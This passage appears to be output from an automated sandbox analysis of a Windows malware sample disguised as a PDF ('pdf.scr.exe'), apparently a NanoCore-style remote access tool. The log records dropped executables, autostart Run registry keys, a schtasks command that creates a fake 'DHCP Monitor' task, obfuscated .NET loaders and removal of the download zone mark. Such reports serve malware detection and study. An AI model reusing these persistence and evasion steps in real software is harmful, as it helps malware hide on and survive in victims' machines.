Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,		2_2_0037194F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		2_2_00371F53

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File created: C:\Users\user\AppData\Local\temp\Folder8_410

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

2_2_00394089

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

2_2_00385B27

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

2_2_0039AFDB

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: sfxname	0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: sfxstime	0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Command line argument: STARTDLG	0_2_00CDDF1E

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini

Jump to behavior

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 026910003102350.pdf.scr.exe

Static file information: File size 1064658 > 1048576

Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 026910003102350.pdf.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 026910003102350.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 026910003102350.pdf.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr

Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 026910003102350.pdf.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF640 push ecx; ret	0_2_00CDF653
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDEB78 push eax; ret	0_2_00CDEB96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00360332 push edi; ret	2_2_00360333
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330E06 push ecx; ret	2_2_00330E19
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032DBFA push cs; iretd	2_2_0032DBFD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032DC00 push eax; iretd	2_2_0032DC01

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00315D78

PE file contains sections with non-standard names

Source: 026910003102350.pdf.scr.exe

Static PE information: section name: .didat

PE file contains an invalid checksum

Source: itugx.exe.0.dr	Static PE information: real checksum: 0xe50ad should be: 0xe9063
Source: 026910003102350.pdf.scr.exe	Static PE information: real checksum: 0x0 should be: 0x1079dd

File is packed with WinRar

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

File created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781

Jump to behavior

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Drops PE files

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	File created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome			Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs

Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.scr

Static PE information: 026910003102350.pdf.scr.exe

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		2_2_003A25A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		2_2_0032FC8A

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
